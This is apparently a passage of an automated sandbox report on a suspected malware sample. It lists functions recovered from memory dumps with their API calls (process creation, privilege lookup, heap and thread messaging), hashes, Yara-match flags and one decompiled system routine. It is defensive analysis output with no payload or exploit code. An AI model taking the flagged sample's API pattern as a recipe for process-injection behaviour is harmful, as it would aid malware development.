                                          Function 04829840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.909918766.00000000047C0000.00000040.00000001.sdmp, Offset: 047C0000, based on PE: true
                                          • Associated: 00000007.00000002.910571323.00000000048DB000.00000040.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.910585847.00000000048DF000.00000040.00000001.sdmp Download File
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 674d7cb77f877fd858ed819db3542a3debcb856cfad6be92234d86d0d13a6fec
                                          • Instruction ID: 39ca991a47f3cb1f87c9c5912ee00adcea9d4e3390ee8625a570c9b857591eba
                                          • Opcode Fuzzy Hash: 674d7cb77f877fd858ed819db3542a3debcb856cfad6be92234d86d0d13a6fec
                                          • Instruction Fuzzy Hash: 48900261252041527545B15944045074046A7E0687B91C512A2409A60C8566E86BE6A1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04829860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.909918766.00000000047C0000.00000040.00000001.sdmp, Offset: 047C0000, based on PE: true
                                          • Associated: 00000007.00000002.910571323.00000000048DB000.00000040.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.910585847.00000000048DF000.00000040.00000001.sdmp Download File
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: d0731794a04b943ddc8bcc60da52dd7ad1b27ab53ba1a661dc50ef3d701cdfbd
                                          • Instruction ID: abdad2cb602a82763440d39b5bda2e33fceec91dd64f31670f732717e327ad78
                                          • Opcode Fuzzy Hash: d0731794a04b943ddc8bcc60da52dd7ad1b27ab53ba1a661dc50ef3d701cdfbd
                                          • Instruction Fuzzy Hash: 8990027121100413F11161594504707004997D0687F91C912A1419668D9696D967B1A1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 048299A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.909918766.00000000047C0000.00000040.00000001.sdmp, Offset: 047C0000, based on PE: true
                                          • Associated: 00000007.00000002.910571323.00000000048DB000.00000040.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.910585847.00000000048DF000.00000040.00000001.sdmp Download File
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: f729dd062192ee2bedc51a438289c3648fd16adf56dfe9b1309aa829e9062044
                                          • Instruction ID: 403509df7cd0cae57d5f6e6d14c9cc9dd80b95f998a2428911558087f3d06ece
                                          • Opcode Fuzzy Hash: f729dd062192ee2bedc51a438289c3648fd16adf56dfe9b1309aa829e9062044
                                          • Instruction Fuzzy Hash: 569002A135100442F10061594414B060045D7E1747F51C515E2059664D8659DC6771A6
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 048295D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.909918766.00000000047C0000.00000040.00000001.sdmp, Offset: 047C0000, based on PE: true
                                          • Associated: 00000007.00000002.910571323.00000000048DB000.00000040.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.910585847.00000000048DF000.00000040.00000001.sdmp Download File
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 4cf774a2ba0356ddf5da7f7a32080cf47fa75de7f747aacdeef2a3d927a30f6f
                                          • Instruction ID: de6c2dc0619227243fbaa282cff0cd2f772fdaeff915635e2047c7cba4959041
                                          • Opcode Fuzzy Hash: 4cf774a2ba0356ddf5da7f7a32080cf47fa75de7f747aacdeef2a3d927a30f6f
                                          • Instruction Fuzzy Hash: 1C9002A121200003610571594414616404A97E0647F51C521E20096A0DC565D8A671A5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04829910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.909918766.00000000047C0000.00000040.00000001.sdmp, Offset: 047C0000, based on PE: true
                                          • Associated: 00000007.00000002.910571323.00000000048DB000.00000040.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.910585847.00000000048DF000.00000040.00000001.sdmp Download File
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: ed1f65c2f533ceb2707bafac516201df5780ea4bbdd768374b0c217439778dee
                                          • Instruction ID: 21a2c8b8c4330df44d035d95b24c9e6a9816c377174dba053e2fdddee42927da
                                          • Opcode Fuzzy Hash: ed1f65c2f533ceb2707bafac516201df5780ea4bbdd768374b0c217439778dee
                                          • Instruction Fuzzy Hash: 4B9002B121100402F14071594404746004597D0747F51C511A6059664E8699DDEA76E5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04829540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.909918766.00000000047C0000.00000040.00000001.sdmp, Offset: 047C0000, based on PE: true
                                          • Associated: 00000007.00000002.910571323.00000000048DB000.00000040.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.910585847.00000000048DF000.00000040.00000001.sdmp Download File
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 676af8859365413eb9f68c0808e0e2df71abd98fd5a2c0656dc97d99aacdbfb4
                                          • Instruction ID: 9cd88d2ca6b1d780914522ba1393e418bffc66f4d7496e9daf078744f38c4691
                                          • Opcode Fuzzy Hash: 676af8859365413eb9f68c0808e0e2df71abd98fd5a2c0656dc97d99aacdbfb4
                                          • Instruction Fuzzy Hash: 0B900265221000032105A5590704507008697D5797751C521F200A660CD661D87661A1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 048296D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.909918766.00000000047C0000.00000040.00000001.sdmp, Offset: 047C0000, based on PE: true
                                          • Associated: 00000007.00000002.910571323.00000000048DB000.00000040.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.910585847.00000000048DF000.00000040.00000001.sdmp Download File
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 1572a71abd0065da22e783debb76a5866c566547b942aefd7a97ab4bc4a17561
                                          • Instruction ID: f0f439619da5147b68b4544b58802612e23324f3bf91151804c174afe3286fa5
                                          • Opcode Fuzzy Hash: 1572a71abd0065da22e783debb76a5866c566547b942aefd7a97ab4bc4a17561
                                          • Instruction Fuzzy Hash: F190027121100842F10061594404B46004597E0747F51C516A1119764D8655D86675A1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 048296E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.909918766.00000000047C0000.00000040.00000001.sdmp, Offset: 047C0000, based on PE: true
                                          • Associated: 00000007.00000002.910571323.00000000048DB000.00000040.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.910585847.00000000048DF000.00000040.00000001.sdmp Download File
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: dac758f89581ae37a70ef18188104d86122d0bcb5fc45d7ccd509a43f4dcebd4
                                          • Instruction ID: eb21212cc32605813a48e6b9f24b6b5f9ead15c60fc65a6201dbddf4219065b8
                                          • Opcode Fuzzy Hash: dac758f89581ae37a70ef18188104d86122d0bcb5fc45d7ccd509a43f4dcebd4
                                          • Instruction Fuzzy Hash: F090027121108802F1106159840474A004597D0747F55C911A5419768D86D5D8A671A1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04829650, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.909918766.00000000047C0000.00000040.00000001.sdmp, Offset: 047C0000, based on PE: true
                                          • Associated: 00000007.00000002.910571323.00000000048DB000.00000040.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.910585847.00000000048DF000.00000040.00000001.sdmp Download File
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 05557e631bbeeb7daa4d3b6f675e6a9c8dbd3ca1af10caa7fb37842ce5a96059
                                          • Instruction ID: 444e85bc24b199447604a1414f9dd79524088b11b36fda9eac7ee482c83d4614
                                          • Opcode Fuzzy Hash: 05557e631bbeeb7daa4d3b6f675e6a9c8dbd3ca1af10caa7fb37842ce5a96059
                                          • Instruction Fuzzy Hash: 5F90027121504842F14071594404A46005597D074BF51C511A10597A4D9665DD6AB6E1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04829A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.909918766.00000000047C0000.00000040.00000001.sdmp, Offset: 047C0000, based on PE: true
                                          • Associated: 00000007.00000002.910571323.00000000048DB000.00000040.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.910585847.00000000048DF000.00000040.00000001.sdmp Download File
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: c4ad21df81fbb56089db66f4fa5363683b249d8604c3febbf0f8001185b767ff
                                          • Instruction ID: d8d8aa2c6bb54b3521914fa80cfda33629f706f8cebed3ef574f501020a4aa9a
                                          • Opcode Fuzzy Hash: c4ad21df81fbb56089db66f4fa5363683b249d8604c3febbf0f8001185b767ff
                                          • Instruction Fuzzy Hash: AB90026122180042F20065694C14B07004597D0747F51C615A1149664CC955D87665A1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04829660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.909918766.00000000047C0000.00000040.00000001.sdmp, Offset: 047C0000, based on PE: true
                                          • Associated: 00000007.00000002.910571323.00000000048DB000.00000040.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.910585847.00000000048DF000.00000040.00000001.sdmp Download File
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 9a486db4999439403971c0f0efcd46c45d7bae4816044e4e130c87e5d9e3c499
                                          • Instruction ID: 548e3a6adbe4084ee0c2f2606fe5ab3f20690ae6eee29720411503f688339855
                                          • Opcode Fuzzy Hash: 9a486db4999439403971c0f0efcd46c45d7bae4816044e4e130c87e5d9e3c499
                                          • Instruction Fuzzy Hash: 2090027121100802F1807159440464A004597D1747F91C515A101A764DCA55DA6E77E1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04829780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.909918766.00000000047C0000.00000040.00000001.sdmp, Offset: 047C0000, based on PE: true
                                          • Associated: 00000007.00000002.910571323.00000000048DB000.00000040.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.910585847.00000000048DF000.00000040.00000001.sdmp Download File
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: a55a70f3c3236feb9a2981c4e0d4d96a0a030f52bff8b77d49907fb7b63deaaf
                                          • Instruction ID: e2332e672b3d5550a6fd2224d7adc427bfdf2a91c81f73ad1f30c02ee52cc5c6
                                          • Opcode Fuzzy Hash: a55a70f3c3236feb9a2981c4e0d4d96a0a030f52bff8b77d49907fb7b63deaaf
                                          • Instruction Fuzzy Hash: CA90026922300002F1807159540860A004597D1647F91D915A100A668CC955D87E63A1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04829FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.909918766.00000000047C0000.00000040.00000001.sdmp, Offset: 047C0000, based on PE: true
                                          • Associated: 00000007.00000002.910571323.00000000048DB000.00000040.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.910585847.00000000048DF000.00000040.00000001.sdmp Download File
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: b1b451d07062491bdddb1dc424db1c019b13bc70d4bd3e35d466fc244fbc217a
                                          • Instruction ID: a5fe5e75bd27bb026fc3e5215fa09d70aed1e7a690d694496038cfec478ef90b
                                          • Opcode Fuzzy Hash: b1b451d07062491bdddb1dc424db1c019b13bc70d4bd3e35d466fc244fbc217a
                                          • Instruction Fuzzy Hash: 9790027132114402F11061598404706004597D1647F51C911A1819668D86D5D8A671A2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04829710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.909918766.00000000047C0000.00000040.00000001.sdmp, Offset: 047C0000, based on PE: true
                                          • Associated: 00000007.00000002.910571323.00000000048DB000.00000040.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.910585847.00000000048DF000.00000040.00000001.sdmp Download File
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: d6207817e8eee55953fe5c4c30bab137724676414858de85df68424b5f1939dc
                                          • Instruction ID: 3f2617ac2143ec0c0ec89aad37c7b739488fb118e129ba8415efb3a301b57921
                                          • Opcode Fuzzy Hash: d6207817e8eee55953fe5c4c30bab137724676414858de85df68424b5f1939dc
                                          • Instruction Fuzzy Hash: EA90027121100402F10065995408646004597E0747F51D511A6019665EC6A5D8A671B1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0048A0A2, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 36memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00473AF8), ref: 0048A09D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.907352431.0000000000470000.00000040.00000001.sdmp, Offset: 00470000, based on PE: false
                                          Yara matches
                                          Similarity
                                          • API ID: FreeHeap
                                          • String ID: .z`
                                          • API String ID: 3298025750-1441809116
                                          • Opcode ID: 2bf74252af5eda8c5d2327dc0090f3072bf8c92222bfe32d0686ef9d43c92925
                                          • Instruction ID: 1311130b734d1f2650096b148ec07d7ee30dc623e0bc291454d39fd6abbaa53b
                                          • Opcode Fuzzy Hash: 2bf74252af5eda8c5d2327dc0090f3072bf8c92222bfe32d0686ef9d43c92925
                                          • Instruction Fuzzy Hash: D7F090B51481046FDB00DFA8DC81D9B37A8EF85214F19899AFC9857202C136EA25C7A1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0048A070, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00473AF8), ref: 0048A09D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.907352431.0000000000470000.00000040.00000001.sdmp, Offset: 00470000, based on PE: false
                                          Yara matches
                                          Similarity
                                          • API ID: FreeHeap
                                          • String ID: .z`
                                          • API String ID: 3298025750-1441809116
                                          • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                          • Instruction ID: 4069477c67b069b7a020f53e1f2842d4159f86bccf87bc0c86c7c69b456559b6
                                          • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                          • Instruction Fuzzy Hash: 9EE04FB12002086BD714EF59CC45EA777ACEF88750F018559FD0857241C630F910CBF0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004782B7, Relevance: 3.1, APIs: 2, Instructions: 58threadwindowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0047834A
                                          • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0047836B
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.907352431.0000000000470000.00000040.00000001.sdmp, Offset: 00470000, based on PE: false
                                          Yara matches
                                          Similarity
                                          • API ID: MessagePostThread
                                          • String ID:
                                          • API String ID: 1836367815-0
                                          • Opcode ID: e6287726946e534d92d92955efff3d0b406e29f56f5fce571eeb39be9df79633
                                          • Instruction ID: beae5bc0de13ba092a37a7f8dc3aa81fab2133d450eefa9b1c1115358b67c956
                                          • Opcode Fuzzy Hash: e6287726946e534d92d92955efff3d0b406e29f56f5fce571eeb39be9df79633
                                          • Instruction Fuzzy Hash: 810128316802287AEB20A6489C46FFE331CAB40F15F04454EFE08BA2C2DA99290543ED
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004782F0, Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0047834A
                                          • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0047836B
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.907352431.0000000000470000.00000040.00000001.sdmp, Offset: 00470000, based on PE: false
                                          Yara matches
                                          Similarity
                                          • API ID: MessagePostThread
                                          • String ID:
                                          • API String ID: 1836367815-0
                                          • Opcode ID: 4a55148ff9da4d85293f36c1d21b3ca726a4155c96c158c46edfd0097c785396
                                          • Instruction ID: d32c9650a7c47480bebf3a8e9b5890372840743d6caaf0bd099ae97c030431c9
                                          • Opcode Fuzzy Hash: 4a55148ff9da4d85293f36c1d21b3ca726a4155c96c158c46edfd0097c785396
                                          • Instruction Fuzzy Hash: 4A01D831A802287AE720B6959C47FFE761C6B40F54F044119FF04BA1C1E699690547F9
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0048A0DD, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON
                                          Download Yara Rule
                                          APIs
                                          • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 0048A134
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.907352431.0000000000470000.00000040.00000001.sdmp, Offset: 00470000, based on PE: false
                                          Yara matches
                                          Similarity
                                          • API ID: CreateInternalProcess
                                          • String ID:
                                          • API String ID: 2186235152-0
                                          • Opcode ID: 0866ea1636eae008d1435bd921299407aff7d8734022911b59dc23108afb914f
                                          • Instruction ID: b8751362c4c10d2fefc0776fdfd11b8340535aad570b2c1f71beeee5b71379f9
                                          • Opcode Fuzzy Hash: 0866ea1636eae008d1435bd921299407aff7d8734022911b59dc23108afb914f
                                          • Instruction Fuzzy Hash: 4D01F6B6204108BFCB08DF89CC80EEB37ADAF8C354F158248FA4D97241C630E851CBA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0048A0E0, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON
                                          Download Yara Rule
                                          APIs
                                          • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 0048A134
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.907352431.0000000000470000.00000040.00000001.sdmp, Offset: 00470000, based on PE: false
                                          Yara matches
                                          Similarity
                                          • API ID: CreateInternalProcess
                                          • String ID:
                                          • API String ID: 2186235152-0
                                          • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                          • Instruction ID: b23f48fc39f9181978636cafc886dc43fd1627a5a92c4e50905247edf647c4be
                                          • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                          • Instruction Fuzzy Hash: 8501B2B2214108BFCB54DF89DC80EEB77ADAF8C754F158258FA0DA7241C630E851CBA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0048A1C8, Relevance: 1.5, APIs: 1, Instructions: 40COMMON
                                          Download Yara Rule
                                          APIs
                                          • LookupPrivilegeValueW.ADVAPI32(00000000,?,0047F1A2,0047F1A2,?,00000000,?,?), ref: 0048A200
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.907352431.0000000000470000.00000040.00000001.sdmp, Offset: 00470000, based on PE: false
                                          Yara matches
                                          Similarity
                                          • API ID: LookupPrivilegeValue
                                          • String ID:
                                          • API String ID: 3899507212-0
                                          • Opcode ID: 7a97db4af4887cf14c826a2e3486b0b15f9c0a9b387962d7d2a0a822a1ebedf1
                                          • Instruction ID: b24600738626883fca1ce19a3996a6d1cce21129ea664bde9d6595442f634b56
                                          • Opcode Fuzzy Hash: 7a97db4af4887cf14c826a2e3486b0b15f9c0a9b387962d7d2a0a822a1ebedf1
                                          • Instruction Fuzzy Hash: 16F0CDB12002186FDB10EF95DC85DEB7768EF84724F01889AFD085B242C635E920CBF1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0048A030, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • RtlAllocateHeap.NTDLL(00484506,?,00484C7F,00484C7F,?,00484506,?,?,?,?,?,00000000,00000000,?), ref: 0048A05D
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.907352431.0000000000470000.00000040.00000001.sdmp, Offset: 00470000, based on PE: false
                                          Yara matches
                                          Similarity
                                          • API ID: AllocateHeap
                                          • String ID:
                                          • API String ID: 1279760036-0
                                          • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                          • Instruction ID: 5655feba25b4f12377a5009391a5170a40c8294688b89ebbc5ab068533dea3f4
                                          • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                          • Instruction Fuzzy Hash: F5E04FB1200208ABD714EF59CC41EA777ACEF88754F158559FE085B241C530F910CBF0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0048A1D0, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                          Download Yara Rule
                                          APIs
                                          • LookupPrivilegeValueW.ADVAPI32(00000000,?,0047F1A2,0047F1A2,?,00000000,?,?), ref: 0048A200
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.907352431.0000000000470000.00000040.00000001.sdmp, Offset: 00470000, based on PE: false
                                          Yara matches
                                          Similarity
                                          • API ID: LookupPrivilegeValue
                                          • String ID:
                                          • API String ID: 3899507212-0
                                          • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                          • Instruction ID: 0bcf9e2c54911dfe674c7541fa14458095f9e3ddda1422f1bed8f217a86fec90
                                          • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                          • Instruction Fuzzy Hash: A9E01AB12002086BDB10EF49CC85EEB37ADEF88650F018555FA0867241C934E8108BF5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0047F6A0, Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                          Download Yara Rule
                                          APIs
                                          • SetErrorMode.KERNELBASE(00008003,?,00478CF4,?), ref: 0047F6CB
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.907352431.0000000000470000.00000040.00000001.sdmp, Offset: 00470000, based on PE: false
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorMode
                                          • String ID:
                                          • API String ID: 2340568224-0
                                          • Opcode ID: cec8ba978ca00a4152f16fa99d3564a32c161d26ed3cfe0d05bc2e8c73902fa4
                                          • Instruction ID: bddd975c778158ab4d506b2aafde3b5264d4e77fc93a04d5f16af0a38af736c5
                                          • Opcode Fuzzy Hash: cec8ba978ca00a4152f16fa99d3564a32c161d26ed3cfe0d05bc2e8c73902fa4
                                          • Instruction Fuzzy Hash: 3ED05E616903043AE610BAA59C03F6632896B44B04F494065FA48963C3E954E4018169
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0482967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.909918766.00000000047C0000.00000040.00000001.sdmp, Offset: 047C0000, based on PE: true
                                          • Associated: 00000007.00000002.910571323.00000000048DB000.00000040.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.910585847.00000000048DF000.00000040.00000001.sdmp Download File
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: ad45a019b63f788a1dd800a8ce50da6a4b517c0214d7219a06222c0cb69c98e1
                                          • Instruction ID: 303d7c5e005c6a5c33ed0897cdb7a41cc59ca0c4475d2ab6b9587f3b13fd68c1
                                          • Opcode Fuzzy Hash: ad45a019b63f788a1dd800a8ce50da6a4b517c0214d7219a06222c0cb69c98e1
                                          • Instruction Fuzzy Hash: 91B09BB19014D5C9F711D7604708717794077D0746F17C561D2024751A4778D1D5F5F5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Non-executed Functions

                                          Function 0487FDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 53%
                                          			E0487FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E0482CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E04875720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E04875720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}










                                          0x0487fdda
                                          0x0487fde2
                                          0x0487fde5
                                          0x0487fdec
                                          0x0487fdfa
                                          0x0487fdff
                                          0x0487fe0a
                                          0x0487fe0f
                                          0x0487fe17
                                          0x0487fe1e
                                          0x0487fe19
                                          0x0487fe19
                                          0x0487fe19
                                          0x0487fe20
                                          0x0487fe21
                                          0x0487fe22
                                          0x0487fe25
                                          0x0487fe40

                                          APIs
                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0487FDFA
                                          Strings
                                          • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 0487FE2B
                                          • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 0487FE01
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.909918766.00000000047C0000.00000040.00000001.sdmp, Offset: 047C0000, based on PE: true
                                          • Associated: 00000007.00000002.910571323.00000000048DB000.00000040.00000001.sdmp Download File
                                          • Associated: 00000007.00000002.910585847.00000000048DF000.00000040.00000001.sdmp Download File
                                          Similarity
                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                          • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                          • API String ID: 885266447-3903918235
                                          • Opcode ID: 513bc6790fd2a456a27d297130f703b517e0a733b880875d11496f1a2e46f721
                                          • Instruction ID: c31929e441927226b616561706f955226260dbcb84d2303df2453f76bbf75cfd
                                          • Opcode Fuzzy Hash: 513bc6790fd2a456a27d297130f703b517e0a733b880875d11496f1a2e46f721
                                          • Instruction Fuzzy Hash: 42F0F676600601BFE7201A59DC02F33BBAAEB44770F140714F7289A5E1EAA2F86096F5
                                          Uniqueness

                                          Uniqueness Score: -1.00%